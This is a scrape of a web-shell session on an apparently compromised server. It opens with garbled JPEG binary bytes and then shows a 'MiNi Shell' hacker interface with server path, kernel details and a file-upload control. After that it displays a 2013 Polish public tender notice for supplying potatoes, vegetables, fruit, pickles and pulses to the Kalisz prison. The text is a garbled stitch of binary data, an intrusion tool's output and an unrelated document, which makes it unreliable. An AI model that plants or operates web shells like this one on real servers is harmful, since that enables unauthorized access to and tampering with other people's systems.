JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131209/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131209/507466-N-2013.html

<p class="kh_header"><b>Kalisz: Przetarg nieograniczony na dostawy dla potrzeb Zakładu Karnego w Kaliszu ziemniaków jadalnych, warzyw i owoców, warzyw przetworzonych kwaszonych, warzyw strączkowych suchych.</b><br>
<b>Numer ogłoszenia: 507466 - 2013; data zamieszczenia: 09.12.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Karny Kalisz , ul. Łódzka 2, 62-800 Kalisz, woj. wielkopolskie, tel. 0-62 7654100, 7654104, faks 0-62 7654110.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> sw.gov.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> sw.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: jednostka organizacyjna nie mającaosobowośći prawnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przetarg nieograniczony na dostawy dla potrzeb Zakładu Karnego w Kaliszu ziemniaków jadalnych, warzyw i owoców, warzyw przetworzonych kwaszonych, warzyw strączkowych suchych..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> CZĘŚĆ I  ziemniaki
Ziemniak jadalny wczesny Ziemniak jadalny późny kod CPV 03212100-1 Odmiany jadalne przeznaczone do bezpośredniego spożycia. Odmiana jednorodna przy każdorazowej dostawie. Cechy dyskwalifikujące:
 zanieczyszczenia środkami ochrony roślinnych, zaparzenie i zapleśnienie, porośnięcie kiełkami powyżej 1 cm, obce zapachy. Opakowania raszlowe do 30 kg szacowana ilość 60000,00 kg

CZĘŚĆ II warzywa i owoce
Kapusta biała kod CPV 03221410-3 Odmiany jadalne do bezpośredniego spożycia w klasie I, cechy dyskwalifikujące; zaparzenie, obcy smak i zapach, obecność szkodników i ich pozostałości, zgnicie, pozostałości środków ochrony roślin, zamarznięcie. Opakowanie - worki raszlowe do 30 kg, odmiana jednorodna przy każdorazowej dostawie szacowana ilość 5000,00 kg
Burak czerwony wybór I kod CPV 03221111-7 Odmiany jadalne, minimalna średnica korzenia 6 cm; cechy dyskwalifikujące: zaparzenie, zamarznięte, obcy smak i zapach, pozostałości środków ochrony roślin, nadgnicie, zwiędnięcie. Opakowanie - worki raszlowe do 30 kg; odmiana jednorodna przy każdorazowej dostawie szacowana ilość 7000,00
Cebula kod CPV 03221113-1 Cebula do bezpośredniego spożycia w klasie I; średnica nie mniej niż 4 cm; cechy dyskwalifikujące: zgnicie, zamarznięcie, obcy smak i zapach, pozostałości środków ochrony roślin, uszkodzenia przez choroby i szkodniki. Opakowanie - worki raszlowe do 30 kg; odmiana jednorodna przy każdorazowej dostawie szacowana ilość 7000,00 kg.
Marchew kod CPV-03221112-4 Marchew w I klasie, odmiany jadalne do bezpośredniego spożycia, średnica korzenia mierzona w najszerszym przekroju od 2,5 cm do 5 cm; cechy dyskwalifikujące: nadgniłe, zamarznięte, zaparzone, zapleśnione, obcy smak i zapach, pozostałości środków ochrony roślin, zwiędnięcie, uszkodzenie przez choroby lub szkodniki, silne uszkodzenia mechaniczne. Opakowanie - worki raszlowe do 30 kg; odmiana jednorodna przy każdorazowej dostawie szacowana ilość 6000,00kg
Ogórki świeże kod CPV 03221270-9 Odmiany jadalne do bezpośredniego spożycia w klasie I; cechy dyskwalifikujące: obcy zapach i smak, zwiędnięcia, zaparzenia, nadgnicia, gorzki smak, pozostałości środków ochrony roślin. Opakowania: worek foliowy do 10 kg; odmiana jednorodna przy każdorazowej dostawie, średnica 3 cm - 3,50 cm szacowana ilość 1500,00 kg
Pietruszka korzeniowa kod CPV 03221000-6 PN-R-75370:1996; pietruszka korzeń w I klasie; odmiany jadalne; średnica korzenia mierzona w najszerszym przekroju od 2,50 cm do 5 cm.; cechy dyskwalifikujące: objawy gnicia, zabrudzenia i zanieczyszczenia, zmarznięta, uszkodzenia spowodowane chorobą lub szkodnikami, pęknięcia lub stłuczenia, obcy smak i zapach. Opakowanie - worki raszlowe do 30 kg, odmiana jednorodna przy każdorazowej dostawie szacowana ilość 5000,00 kg
Pomidory  kod CPV 03221240-0 Odmiany jadalne do bezpośredniego spożycia w klasie I, minimalna średnica 4 cm  5 cm; cechy dyskwalifikujące: pęknięcia, widoczne zielone piętki, zaparzenie, nadgnicie, porażenie chorobami, obcy smak i zapach, pozostałości środków ochrony roślin. Opakowania: karton do 6 kg; odmiana jednorodna przy każdorazowej dostawie szacowana ilość 1200,00 kg
Jabłka krajowe kod CPV 03222321-9 Jabłka w klasie I, minimalna średnica owoców   7 cm. Cechy dyskwalifikujące: gnicie, zanieczyszczenia obce, szkodniki, uszkodzenia od szkodników, obcy zapach i smak, zamarznięte, z rozpadem miąższu porażone miękką oparzelina chłodniową, zwiędnięte, uszkodzona skórka miąższu, zagrzybienie. Opakowanie: skrzynka do 15 kg. Odmiana jednorodna przy każdorazowej dostawie. Szacowana ilość 800,00 kg.
Papryka czerwona słodka kod CPV 03221230-7 PN-R-75528:1996; odmiany jadalne do bezpośredniego spożycia; cechy dyskwalifikujące: łączenie papryki o różnej barwie, nadgniłe, zamarznięte, zaparzone, zapleśnione, obcy smak i zapach, pozostałości środków ochrony roślin, uszkodzenia przez choroby lub szkodniki, silne uszkodzenia mechaniczne, zwiędnięcia. Opakowania: worki foliowe do 5 kg, odmiana jednorodna przy każdorazowej dostawie szacowana ilość 100,00kg
Por kod CPV 03221000-6 PN-R-75521:1996; por w klasie I odmiany jadalne do bezpośredniego spożycia; bez pędów nasiennych, z usuniętymi nieświeżymi lub zwiędniętymi liśćmi, minimum jednej trzeciej długości o barwie białej do zielonkawo białej, minimalna średnica 30 mm. Opakowanie - worek raszlowy do 10 kg; odmiana jednorodna przy każdorazowej dostawi; szacowana ilość 1700,00 kg
Seler korzeniowy kod CPV 03221000-6 PN-R-75371:1996; seler korzeniowy w klasie I, odmiany jadalne, sałatkowe, średnica od 7 cm; cechy dyskwalifikujące: objawy gnicia, nadmierne zabrudzenia i zanieczyszczenia, zamarznięte, wyrastający pęd kwiatostanu, obcy zapach lub smak, stłuczenia i ordzewienia skórki, puste przestrzenie na przekroju podłużnym. Opakowanie - worki raszlowe do 30 kg; odmiana jednorodna przy każdorazowej dostawie; szacowana ilość 5000,00 kg.
Cukinia kod CPV 03221250-3 Owoc cukinii klasy I; zbliżony kształtem do ogórków, zdrowy, młody o długości nie mniejszej niż 25 cm o delikatnej skórce cechy dyskwalifikujące: obcy zapach i smak, zwiędnięcia, zaparzenia, nadgnicia, gorzki smak, pozostałości środków ochrony roślin szacowana ilość 200,00 kg
Kalafior św. kod CPV 03221420-6 Odmiany jadalne w klasie I, długość łuku róży nie mniejsza niż 10 cm i średnica nie mniejsza niż 20 cm; cechy dyskwalifikujące: zaparzenie, pozostałości środków ochrony roślin, obecność gąsienic, mszyc i innych szkodników lub ich pozostałości, nadgnicie, obcy smak i zapach. Opakowanie: skrzynka; odmiana jednorodna przy każdorazowej dostawie szacowana ilość 400,00 kg
Koperek kod CPV 03221000-6 PN-R-75380:1997; świeży bez pożółkłych i zeschniętych części, bez objawów pleśni i gnicia lub zaparzenia, czysty bez zanieczyszczeń, w tym części traw i chwastów, bez pędów kwiatostanowych, wolny od szkodników i uszkodzeń spowodowanych przez mróz i chorobę, bez pozostałości środków ochrony roślin. Opakowanie: 10 pęczków koperku w skrzynce szacowana ilość 50,00 kg.

CZĘŚĆ III - warzywa przetworzone kwaszone
Ogórek kiszony - Ogórki kiszone dostarczane w beczkach lub wiaderkach do 30 kg. Ogórki o odpowiednim stopniu  zakwaszenia, z przyprawami koper, czosnek, sól, chrzan. Szacowana ilość 4000,00 kg 
Kapusta kiszona - Kapusta kiszona dostarczona w beczkach lub wiaderkach do 30 kg. Kapusta  o odpowiednim stopniu zakwaszenia. Szacowana ilość 5000,00kg

CZĘŚĆ III - warzywa strączkowe suche
Groch cały suchy kod CPV 03212213-6 Groch łuskany, suszony, ziarna jednorodne odmianowo, zdrowe, czyste, bez śladów uszkodzeń mechanicznych  szacowana ilość 400,00 kg 
Fasola sucha średnia kod CPV 03221210-1 Fasola biała, suszona, ziarna zbliżone wielkością do odmiany średni Jaś, w całości, jednorodne odmianowo, zdrowe czyste, bez śladów uszkodzeń mechanicznych szacowana ilość 450,00 kg.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 03.20.00.00-3, 15.33.00.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca składa oświadczenie Wykonawcy o spełnieniu warunków w postępowaniu z art. 22 PZP z wykorzystaniem wzoru będącego załącznikiem nr 3 do SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca składa oświadczenie Wykonawcy o spełnieniu warunków w postępowaniu z art. 22 PZP z wykorzystaniem wzoru będącego załącznikiem nr 3 do SIWZ</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca składa oświadczenie Wykonawcy o spełnieniu warunków w postępowaniu z art. 22 PZP z wykorzystaniem wzoru będącego załącznikiem nr 3 do SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca składa oświadczenie Wykonawcy o spełnieniu warunków w postępowaniu z art. 22 PZP z wykorzystaniem wzoru będącego załącznikiem nr 3 do SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca składa oświadczenie Wykonawcy o spełnieniu warunków w postępowaniu z art. 22 PZP z wykorzystaniem wzoru będącego załącznikiem nr 3 do SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>W przypadku gospodarstw rolnych przez aktualny odpis z właściwego rejestru należy rozumieć zaświadczenie z urzędu gminy o posiadanych gruntach rolnych wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Umowa może być zmieniona w stosunku do treści złożonej oferty w następujących
przypadkach:
1) w przypadku zmiany osób reprezentujących strony w przypadku zmian organizacyjnych;
2) w przypadku zmiany przepisów powszechnie obowiązujących, która wymusza zmianę treści umowy;
3) w przypadku zmian wynikających z okoliczności, których nie można było przewidzieć w dniu zawarcia umowy, a są one korzystne dla zamawiającego;</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> sw.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zakład Karny w Kaliszu
ul. Łódzka 2; 62-800 Kalisz
dział Kwatermistrzowski.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.12.2013 godzina 09:00, miejsce: Sekretariat Zakładu Karnego w Kaliszu
ul. Łódzka 2; 62-800 Kalisz.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Ziemniaki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ziemniak jadalny wczesny Ziemniak jadalny późny kod CPV 03212100-1 Odmiany jadalne przeznaczone do bezpośredniego spożycia. Odmiana jednorodna przy każdorazowej dostawie. Cechy dyskwalifikujące:
- zanieczyszczenia środkami ochrony roślinnych, zaparzenie i zapleśnienie, porośnięcie kiełkami powyżej 1 cm, obce zapachy. Opakowania raszlowe do 30 kg szacowana ilość 60000,00 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.21.21.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> warzywa i owoce.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kapusta biała kod CPV 03221410-3 Odmiany jadalne do bezpośredniego spożycia w klasie I, cechy dyskwalifikujące; zaparzenie, obcy smak i zapach, obecność szkodników i ich pozostałości, zgnicie, pozostałości środków ochrony roślin, zamarznięcie. Opakowanie - worki raszlowe do 30 kg, odmiana jednorodna przy każdorazowej dostawie szacowana ilość 5000,00 kg
Burak czerwony wybór I kod CPV 03221111-7 Odmiany jadalne, minimalna średnica korzenia 6 cm; cechy dyskwalifikujące: zaparzenie, zamarznięte, obcy smak i zapach, pozostałości środków ochrony roślin, nadgnicie, zwiędnięcie. Opakowanie - worki raszlowe do 30 kg; odmiana jednorodna przy każdorazowej dostawie szacowana ilość7000,00
Cebula kod CPV 03221113-1 Cebula do bezpośredniego spożycia w klasie I; średnica nie mniej niż 4 cm; cechy dyskwalifikujące: zgnicie, zamarznięcie, obcy smak i zapach, pozostałości środków ochrony roślin, uszkodzenia przez choroby i szkodniki. Opakowanie - worki raszlowe do 30 kg; odmiana jednorodna przy każdorazowej dostawie szacowana ilość 7000,00 kg.
Marchew kod CPV-03221112-4 Marchew w I klasie, odmiany jadalne do bezpośredniego spożycia, średnica korzenia mierzona w najszerszym przekroju od 2,5 cm do 5 cm; cechy dyskwalifikujące: nadgniłe, zamarznięte, zaparzone, zapleśnione, obcy smak i zapach, pozostałości środków ochrony roślin, zwiędnięcie, uszkodzenie przez choroby lub szkodniki, silne uszkodzenia mechaniczne. Opakowanie - worki raszlowe do 30 kg; odmiana jednorodna przy każdorazowej dostawie szacowana ilość 6000,00kg
Ogórki świeże kod CPV 03221270-9 Odmiany jadalne do bezpośredniego spożycia w klasie I; cechy dyskwalifikujące: obcy zapach i smak, zwiędnięcia, zaparzenia, nadgnicia, gorzki smak, pozostałości środków ochrony roślin. Opakowania: worek foliowy do 10 kg; odmiana jednorodna przy każdorazowej dostawie, średnica 3 cm - 3,50 cm szacowana ilość 1500,00 kg
Pietruszka korzeniowa kod CPV 03221000-6 PN-R-75370:1996; pietruszka korzeń w I klasie; odmiany jadalne; średnica korzenia mierzona w najszerszym przekroju od 2,50 cm do 5 cm.; cechy dyskwalifikujące: objawy gnicia, zabrudzenia i zanieczyszczenia, zmarznięta, uszkodzenia spowodowane chorobą lub szkodnikami, pęknięcia lub stłuczenia, obcy smak i zapach. Opakowanie - worki raszlowe do 30 kg, odmiana jednorodna przy każdorazowej dostawie szacowana ilość 5000,00 kg
Pomidory  kod CPV 03221240-0 Odmiany jadalne do bezpośredniego spożycia w klasie I, minimalna średnica 4 cm - 5 cm; cechy dyskwalifikujące: pęknięcia, widoczne zielone piętki, zaparzenie, nadgnicie, porażenie chorobami, obcy smak i zapach, pozostałości środków ochrony roślin. Opakowania: karton do 6 kg; odmiana jednorodna przy każdorazowej dostawie szacowana ilość 1200,00 kg
Jabłka krajowe kod CPV 03222321-9 Jabłka w klasie I, minimalna średnica owoców  - 7 cm. Cechy dyskwalifikujące: - gnicie, zanieczyszczenia obce, szkodniki, uszkodzenia od szkodników, obcy zapach i smak, zamarznięte, z rozpadem miąższu porażone miękką oparzelina chłodniową, zwiędnięte, uszkodzona skórka miąższu, zagrzybienie. Opakowanie: skrzynka do 15 kg. Odmiana jednorodna przy każdorazowej dostawie. Szacowana ilość 800,00 kg.
Papryka czerwona słodka kod CPV 03221230-7 PN-R-75528:1996; odmiany jadalne do bezpośredniego spożycia; cechy dyskwalifikujące: łączenie papryki o różnej barwie, nadgniłe, zamarznięte, zaparzone, zapleśnione, obcy smak i zapach, pozostałości środków ochrony roślin, uszkodzenia przez choroby lub szkodniki, silne uszkodzenia mechaniczne, zwiędnięcia. Opakowania: worki foliowe do 5 kg, odmiana jednorodna przy każdorazowej dostawie szacowana ilość 100,00kg
Por kod CPV 03221000-6 PN-R-75521:1996; por w klasie I odmiany jadalne do bezpośredniego spożycia; bez pędów nasiennych, z usuniętymi nieświeżymi lub zwiędniętymi liśćmi, minimum 1-3 długości o barwie białej do zielonkawo białej, minimalna średnica 30 mm. Opakowanie - worek raszlowy do 10 kg; odmiana jednorodna przy każdorazowej dostawi; szacowana ilość 1700,00 kg
Seler korzeniowy kod CPV 03221000-6 PN-R-75371:1996; seler korzeniowy w klasie I, odmiany jadalne, sałatkowe, średnica od 7 cm; cechy dyskwalifikujące: objawy gnicia, nadmierne zabrudzenia i zanieczyszczenia, zamarznięte, wyrastający pęd kwiatostanu, obcy zapach lub smak, stłuczenia i ordzewienia skórki, puste przestrzenie na przekroju podłużnym. Opakowanie - worki raszlowe do 30 kg; odmiana jednorodna przy każdorazowej dostawie; szacowana ilość 5000,00 kg.
Cukinia kod CPV 03221250-3 Owoc cukinii klasy I; zbliżony kształtem do ogórków, zdrowy, młody o długości nie mniejszej niż 25 cm o delikatnej skórce cechy dyskwalifikujące: obcy zapach i smak, zwiędnięcia, zaparzenia, nadgnicia, gorzki smak, pozostałości środków ochrony roślin szacowana ilość 200,00 kg
Kalafior św. kod CPV 03221420-6 Odmiany jadalne w klasie I, długość łuku róży nie mniejsza niż 10 cm i średnica nie mniejsza niż 20 cm; cechy dyskwalifikujące: zaparzenie, pozostałości środków ochrony roślin, obecność gąsienic, mszyc i innych szkodników lub ich pozostałości, nadgnicie, obcy smak i zapach. Opakowanie: skrzynka; odmiana jednorodna przy każdorazowej dostawie szacowana ilość 400,00 kg
